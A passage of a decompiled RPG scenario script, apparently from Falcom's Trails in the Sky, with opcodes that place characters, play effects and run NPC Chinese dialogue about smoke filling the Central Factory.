Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA3, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA3, 2)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_6F9") OP_A2(0x51B) Event(0, 46) Jump("loc_71F") label("loc_6F9") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 2)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_70C") Event(0, 48) Jump("loc_71F") label("loc_70C") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_71F") OP_A2(0x537) Event(0, 49) label("loc_71F") Jump("loc_73D") label("loc_722") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 4)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 3)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_732") Event(0, 47) label("loc_732") Jump("loc_73D") label("loc_735") OP_22(0xE, 0x0, 0x64) Jump("loc_73D") label("loc_73D") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 1)), scpexpr(EXPR_END)), "loc_79F") SetChrPos(0xD, -14600, 8000, 63040, 6) SetChrFlags(0xD, 0x10) SetChrPos(0x10, -15440, 8000, 63040, 3) SetChrFlags(0x10, 0x10) ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) Jump("loc_E6F") label("loc_79F") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 5)), scpexpr(EXPR_END)), "loc_832") SetChrPos(0xD, -21460, 8000, 58770, 270) SetChrPos(0x10, -20870, 8000, 59640, 270) SetChrFlags(0x10, 0x10) ClearChrFlags(0xE, 0x80) SetChrPos(0xE, -23240, 8000, 57820, 45) SetChrFlags(0xE, 0x10) ClearChrFlags(0xC, 0x80) SetChrPos(0xC, -23310, 8000, 59800, 135) SetChrFlags(0xC, 0x10) ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) Jump("loc_E6F") label("loc_832") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 1)), scpexpr(EXPR_END)), "loc_868") ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) Jump("loc_E6F") label("loc_868") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAA, 0)), scpexpr(EXPR_END)), "loc_89E") ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -25190, 8000, 66790, 275) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -17150, 8000, 63800, 358) Jump("loc_E6F") label("loc_89E") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_END)), "loc_98D") ClearChrFlags(0x11, 0x80) SetChrPos(0x11, -23800, 10000, 46930, 180) OP_43(0x11, 0x0, 0x0, 0x3) ClearChrFlags(0x12, 0x80) SetChrPos(0x12, -23170, 8000, 59080, 91) OP_43(0x12, 0x0, 0x0, 0x5) ClearChrFlags(0x13, 0x80) SetChrPos(0x13, -25200, 8000, 67400, 272) ClearChrFlags(0x14, 0x80) SetChrPos(0x14, -31870, 10000, 49240, 326) SetChrFlags(0x14, 0x10) ClearChrFlags(0x17, 0x80) SetChrPos(0x17, -33120, 10000, 50470, 135) SetChrFlags(0x17, 0x10) ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) ClearChrFlags(0x1A, 0x80) SetChrPos(0x1A, -23610, 8000, 70240, 5) OP_43(0x1A, 0x0, 0x0, 0x6) ClearChrFlags(0x1E, 0x80) SetChrPos(0x1E, -48310, 22000, 49830, 163) Jump("loc_E6F") label("loc_98D") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_CF9") ClearChrFlags(0xA, 0x80) SetChrPos(0xA, -30660, 9000, 60810, 69) OP_43(0xA, 0x0, 0x0, 0x3) OP_51(0xA, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x25, 0x80) SetChrPos(0x25, -24500, 8750, 51360, 18) OP_51(0x25, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x11, 0x80) SetChrPos(0x11, -34110, 10000, 62990, 166) OP_43(0x11, 0x0, 0x0, 0x4) OP_51(0x11, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) OP_51(0x19, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x1A, 0x80) SetChrPos(0x1A, -23610, 8000, 70240, 5) OP_43(0x1A, 0x0, 0x0, 0x6) OP_51(0x1A, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x1B, 0x80) SetChrPos(0x1B, -27110, 8000, 60420, 69) SetChrFlags(0x1B, 0x10) OP_51(0x1B, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x1C, 0x80) SetChrPos(0x1C, -27070, 8000, 59620, 359) SetChrFlags(0x1C, 0x10) OP_51(0x1C, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0xB, 0x80) SetChrPos(0xB, -33870, 10000, 57010, 292) OP_51(0xB, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x1D, 0x80) SetChrPos(0x1D, -30810, 10000, 48800, 320) OP_43(0x1D, 0x0, 0x0, 0x7) OP_51(0x1D, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x9, 0x80) SetChrPos(0x9, -32630, 10000, 58920, 255) OP_51(0x9, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x1E, 0x80) SetChrPos(0x1E, -26600, 8000, 55790, 279) OP_51(0x1E, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x1F, 0x80) SetChrPos(0x1F, -21730, 8000, 53410, 270) OP_43(0x1F, 0x0, 0x0, 0x8) OP_51(0x1F, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x17, 0x80) SetChrPos(0x17, -29430, 8000, 57220, 85) SetChrFlags(0x17, 0x10) OP_51(0x17, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x21, 0x80) SetChrPos(0x21, -22660, 8000, 61960, 82) OP_43(0x21, 0x0, 0x0, 0xA) OP_51(0x21, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x22, 0x80) SetChrPos(0x22, -33530, 10000, 52430, 296) OP_51(0x22, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x23, 0x80) SetChrPos(0x23, -33770, 10000, 51140, 330) OP_51(0x23, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x24, 0x80) SetChrPos(0x24, -25860, 8000, 60310, 263) OP_51(0x24, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x26, 0x80) SetChrPos(0x26, -21670, 8000, 66490, 242) OP_51(0x26, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x20, 0x80) SetChrPos(0x20, -23200, 10000, 47850, 272) OP_43(0x20, 0x0, 0x0, 0x9) OP_51(0x20, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0xF, 0x80) SetChrPos(0xF, -30230, 10000, 47900, 298) OP_51(0xF, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_E6F") label("loc_CF9") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA3, 2)), scpexpr(EXPR_END)), "loc_D4C") ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) ClearChrFlags(0x1A, 0x80) SetChrPos(0x1A, -23610, 8000, 70240, 5) OP_43(0x1A, 0x0, 0x0, 0x6) Jump("loc_E6F") label("loc_D4C") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA2, 3)), scpexpr(EXPR_END)), "loc_D82") ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) Jump("loc_E6F") label("loc_D82") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA2, 1)), scpexpr(EXPR_END)), "loc_DB8") ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) Jump("loc_E6F") label("loc_DB8") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA1, 6)), scpexpr(EXPR_END)), "loc_E10") SetChrPos(0xD, -14600, 8000, 63040, 6) SetChrPos(0x10, -15440, 8000, 63040, 3) ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) Jump("loc_E6F") label("loc_E10") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA0, 2)), scpexpr(EXPR_END)), "loc_E6F") SetChrPos(0xD, -14600, 8000, 63040, 6) SetChrFlags(0xD, 0x10) SetChrPos(0x10, -15440, 8000, 63040, 3) SetChrFlags(0x10, 0x10) ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) label("loc_E6F") Return() # Function_0_6A6 end def Function_1_E70(): pass label("Function_1_E70") OP_16(0x2, 0xFA0, 0xFFFDB228, 0xFFFEF278, 0x30052) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA7, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_E9A") OP_B1("t3101_y") Jump("loc_EA3") label("loc_E9A") OP_B1("t3101_n") label("loc_EA3") OP_6F(0x5, 40) OP_70(0x5, 0x0) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA7, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_EC9") OP_4F(0x1, (scpexpr(EXPR_PUSH_LONG, 0x54), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_EF6") label("loc_EC9") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_EE1") OP_4F(0x1, (scpexpr(EXPR_PUSH_LONG, 0x52), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_EF6") label("loc_EE1") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 4)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_EF6") OP_4F(0x1, (scpexpr(EXPR_PUSH_LONG, 0x51), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_EF6") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 4)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_F0A") OP_72(0x3, 0x10) Jump("loc_F0E") label("loc_F0A") OP_64(0x0, 0x1) label("loc_F0E") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 3)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_109C") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1090") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA8, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA9, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA9, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA9, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA9, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_1090") LoadEffect(0x0, "map\\\\mp011_00.eff") PlayEffect(0x0, 0xFF, 0xFF, -49690, 25000, 54030, 0, 0, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 1000) PlayEffect(0x0, 0xFF, 0xFF, -39390, 22000, 56200, 0, 0, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 1000) PlayEffect(0x0, 0xFF, 0xFF, -39390, 22000, 61640, 0, 0, 0, 500, 500, 500, 0xFF, 0, 0, 0, 1000) PlayEffect(0x0, 0xFF, 0xFF, -39850, 19620, 65980, 0, 0, 0, 500, 500, 500, 0xFF, 0, 0, 0, 1000) PlayEffect(0x0, 0xFF, 0xFF, -39770, 17290, 50070, 0, 0, 0, 500, 500, 500, 0xFF, 0, 0, 0, 1000) PlayEffect(0x0, 0xFF, 0xFF, -37130, 10000, 58950, 0, 0, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 1000) label("loc_1090") OP_72(0x0, 0x10) OP_6F(0x0, 60) label("loc_109C") SoundDistance(0xA0, 0xFFFFEDF4, 0x14C8, 0xE790, 0x2710, 0x7530, 0x64, 0x0) OP_43(0x27, 0x0, 0x0, 0x2) Return() # Function_1_E70 end def Function_2_10C0(): pass label("Function_2_10C0") OP_72(0x5, 0x20) OP_72(0x4, 0x20) label("loc_10CA") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_10F5") OP_6F(0x5, 40) OP_70(0x5, 0x0) OP_6F(0x4, 0) OP_70(0x4, 0x28) OP_73(0x5) Jump("loc_10CA") label("loc_10F5") Return() # Function_2_10C0 end def Function_3_10F6(): pass label("Function_3_10F6") OP_51(0xFE, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) RunExpression(0x1, (scpexpr(EXPR_RAND), scpexpr(EXPR_PUSH_LONG, 0xE), scpexpr(EXPR_IMOD), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1126") OP_99(0xFE, 0x0, 0x7, 0x672) Jump("loc_1268") label("loc_1126") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_113F") OP_99(0xFE, 0x1, 0x7, 0x640) Jump("loc_1268") label("loc_113F") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1158") OP_99(0xFE, 0x2, 0x7, 0x60E) Jump("loc_1268") label("loc_1158") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1171") OP_99(0xFE, 0x3, 0x7, 0x5DC) Jump("loc_1268") label("loc_1171") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x4), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_118A") OP_99(0xFE, 0x4, 0x7, 0x5AA) Jump("loc_1268") label("loc_118A") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x5), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_11A3") OP_99(0xFE, 0x5, 0x7, 0x578) Jump("loc_1268") label("loc_11A3") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x6), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_11BC") OP_99(0xFE, 0x6, 0x7, 0x546) Jump("loc_1268") label("loc_11BC") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x7), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_11D5") OP_99(0xFE, 0x0, 0x7, 0x677) Jump("loc_1268") label("loc_11D5") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_11EE") OP_99(0xFE, 0x1, 0x7, 0x645) Jump("loc_1268") label("loc_11EE") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x9), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1207") OP_99(0xFE, 0x2, 0x7, 0x613) Jump("loc_1268") label("loc_1207") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0xA), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1220") OP_99(0xFE, 0x3, 0x7, 0x5E1) Jump("loc_1268") label("loc_1220") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0xB), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1239") OP_99(0xFE, 0x4, 0x7, 0x5AF) Jump("loc_1268") label("loc_1239") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0xC), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1252") OP_99(0xFE, 0x5, 0x7, 0x57D) Jump("loc_1268") label("loc_1252") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0xD), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1268") OP_99(0xFE, 0x6, 0x7, 0x54B) label("loc_1268") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_127D") OP_99(0xFE, 0x0, 0x7, 0x5DC) Jump("loc_1268") label("loc_127D") Return() # Function_3_10F6 end def Function_4_127E(): pass label("Function_4_127E") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_12A1") OP_8D(0xFE, -35270, 61360, -33040, 64150, 3000) Jump("Function_4_127E") label("loc_12A1") Return() # Function_4_127E end def Function_5_12A2(): pass label("Function_5_12A2") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_12C5") OP_8D(0xFE, -26390, 55950, -19770, 61950, 3000) Jump("Function_5_12A2") label("loc_12C5") Return() # Function_5_12A2 end def Function_6_12C6(): pass label("Function_6_12C6") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_12E9") OP_8D(0xFE, -25190, 68440, -20920, 71850, 3000) Jump("Function_6_12C6") label("loc_12E9") Return() # Function_6_12C6 end def Function_7_12EA(): pass label("Function_7_12EA") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_130D") OP_8D(0xFE, -32689, 46510, -30620, 50700, 3000) Jump("Function_7_12EA") label("loc_130D") Return() # Function_7_12EA end def Function_8_130E(): pass label("Function_8_130E") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_1331") OP_8D(0xFE, -25190, 54660, -20780, 60740, 3000) Jump("Function_8_130E") label("loc_1331") Return() # Function_8_130E end def Function_9_1332(): pass label("Function_9_1332") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_1355") OP_8D(0xFE, -26510, 46520, -19100, 49060, 3000) Jump("Function_9_1332") label("loc_1355") Return() # Function_9_1332 end def Function_10_1356(): pass label("Function_10_1356") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_1379") OP_8D(0xFE, -23960, 59250, -21170, 66410, 3000) Jump("Function_10_1356") label("loc_1379") Return() # Function_10_1356 end def Function_11_137A(): pass label("Function_11_137A") Return() # Function_11_137A end def Function_12_137B(): pass label("Function_12_137B") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_13DC") ChrTalk( 0xFE, ( "#690F这烟真是好大啊。\x02\x03", "连中央工房的换气能力\x01", "也应付不过来……\x02", ) ) CloseMessageWindow() label("loc_13DC") TalkEnd(0xFE) Return() # Function_12_137B end def Function_13_13E0(): pass label("Function_13_13E0") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1441") ChrTalk( 0xFE, ( "啊，\x01", "好久没有这么拼命地奔跑了……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "啊啊，真糟糕。\x01", "情况糟透了。\x02", ) ) CloseMessageWindow() label("loc_1441") TalkEnd(0xFE) Return() # Function_13_13E0 end def Function_14_1445(): pass label("Function_14_1445") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_14A7") ChrTalk( 0xFE, ( "工房里面\x01", "已经到处是浓烟了……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "呼呼～～～～\x01", "我还以为死定了呢。\x02", ) ) CloseMessageWindow() label("loc_14A7") TalkEnd(0xFE) Return() # Function_14_1445 end def Function_15_14AB(): pass label("Function_15_14AB") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_14EE") ChrTalk( 0xFE, "有没有受伤的人？\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "如果有的话\x01", "要马上通知我啊。\x02", ) ) CloseMessageWindow() label("loc_14EE") TalkEnd(0xFE) Return() # Function_15_14AB end def Function_16_14F2(): pass label("Function_16_14F2") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1548") ChrTalk( 0xFE, ( "前、前辈！\x01", "怎么办呀。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "发生火灾的话，\x01", "研究数据就要毁掉了！\x02", ) ) CloseMessageWindow() label("loc_1548") TalkEnd(0xFE) Return() # Function_16_14F2 end def Function_17_154C(): pass label("Function_17_154C") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_15EC") ChrTalk( 0xFE, "……呼，好奇怪。\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "无论怎么看\x01", "都不像火灾所冒出的烟啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "不过，\x01", "大家也都没有能冒烟的实验装置。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "那么这些烟\x01", "是从哪里出来的？\x02", ) ) CloseMessageWindow() label("loc_15EC") TalkEnd(0xFE) Return() # Function_17_154C end def Function_18_15F0(): pass label("Function_18_15F0") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1672") ChrTalk( 0xFE, ( "我都不清楚\x01", "自己是怎么逃出来的……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "在逃生的途中\x01", "我突然想起了空贼事件……\x01", "脚差点踩空了。\x02", ) ) CloseMessageWindow() label("loc_1672") TalkEnd(0xFE) Return() # Function_18_15F0 end def Function_19_1676(): pass label("Function_19_1676") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_17AA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1, 2)), scpexpr(EXPR_END)), "loc_1721") ChrTalk( 0xFE, ( "说起来\x01", "的确没有看到拉赛尔呢。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "不过那家伙应该不用让人担心。\x01", "肯定已经逃出来了。\x02", ) ) CloseMessageWindow() Jump("loc_17A7") label("loc_1721") OP_A2(0xA) ChrTalk( 0xFE, ( "呼，\x01", "紧急通道也是很有用处的嘛。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "没那玩意儿的话\x01", 